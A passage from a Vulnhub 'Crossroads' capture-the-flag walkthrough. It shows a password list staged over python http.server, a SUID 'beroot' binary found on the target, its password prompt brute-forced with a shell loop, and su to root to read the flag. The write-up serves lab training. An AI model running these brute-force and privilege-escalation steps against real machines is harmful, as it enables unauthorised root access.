1668605635.4692078-cdaac7888d6459d35735a7a017745968 1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb 1668605659.3538682-7aabde43efa4d275e91debe133aa8673 1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765 1668605657.028825-c3d9ec0541be0e353038bbaa263d8406 1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156 29
1668605654.491967-2c2e9e198566dca626c518c23661cabc 1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4 1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1 29.zlib
1668605655.125798-bcffc227ec961d9a422307bc56aa9f80 1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd 1668605662.1177938-deacfe6927ff1e957b146f28457567cf passlist
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.181 - - [16/Nov/2022 08:46:38] "GET /passlist HTTP/1.1" 200 -
albert@crossroads:/home/albert$ ls
ls
beroot crossroads.png passlist smbshare user.txt
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.9M
drwxr-xr-x 3 albert albert 4.0K Nov 16 07:46 .
drwxr-xr-x 3 root root 4.0K Mar 2 2021 ..
-rwsr-xr-x 1 root root 17K Mar 2 2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar 2 2021 crossroads.png
-rw-rw-rw- 1 albert albert 355K Nov 16 07:33 passlist
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan 3 2021 user.txt
albert@crossroads:/home/albert$
The beroot program has the SUID bit set, so it can be used for privilege escalation; running it prompts for the root password
albert@crossroads:/home/albert$ ./beroot
./beroot
TERM environment variable not set.
enter password for root
-----------------------
password: dd
dd
wrong password!!!
So write a shell loop to brute-force the password:
for i in $(cat passlist);do echo $i | ./beroot; echo $i;done | grep -v wrong
albert@crossroads:/home/albert$ cat rootcreds
cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su - root
su - root
Password: ___drifting___
root@crossroads:~# cd /root
cd /root
root@crossroads:~# ls
ls
beroot.sh creds passwd root.txt
root@crossroads:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@crossroads:~#
root@crossroads:~#
Root flag obtained successfully
Tags: 56.181, kali, albert, 192.168, Crossroads, Vulnhub, target machine, crossroads From: https://www.cnblogs.com/jason-huawen/p/16897851.html